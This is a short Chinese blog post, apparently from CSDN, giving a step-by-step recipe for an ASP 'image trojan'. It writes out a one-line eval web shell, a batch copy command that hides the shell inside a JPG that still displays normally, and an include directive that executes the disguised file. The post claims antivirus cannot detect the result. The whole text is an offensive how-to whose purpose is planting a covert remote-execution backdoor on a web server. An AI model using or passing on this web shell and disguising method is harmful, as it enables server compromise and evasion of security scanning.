滲透之——asp圖片木馬的製作和使用

冰 河發表於2018-12-11

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/84959588

主要亮點:圖片木馬(可以正常開啟顯示的木馬)

先看程式碼:
僅需幾步:圖片和一句話木馬合併,製作可以正常顯示的圖片木馬。
1、找一張圖片,名字改成1.jpg
2、<%eval request(“a”)%>存為1.asp(就是一句話木馬)
3、copy 1.jpg /b + 1.asp /a asp.jpg 存為1.bat檔案

注:以上三個檔案放在同一目錄裡面

複製當前目錄下的1.jpg圖片和當前目錄下的1.asp檔案並以ASCII程式碼的方式合併為 asp.jpg圖片,執行1.bat,就會出現一個圖片asp.jpg,現在這個asp.jpg就是已經做好的木馬了。

這個圖片外表很正常,用縮圖也看不出任何破綻,但是卻非常的危險,讓人防不勝防。

利用方法:新建一個asp.asp 內容為:

<!–#include file=”asp.jpg”–>

把asp.jpg 和 asp.asp 放在同一目錄,然後訪問: asp.asp   用這種方法,任何防毒是搜不到的

相關文章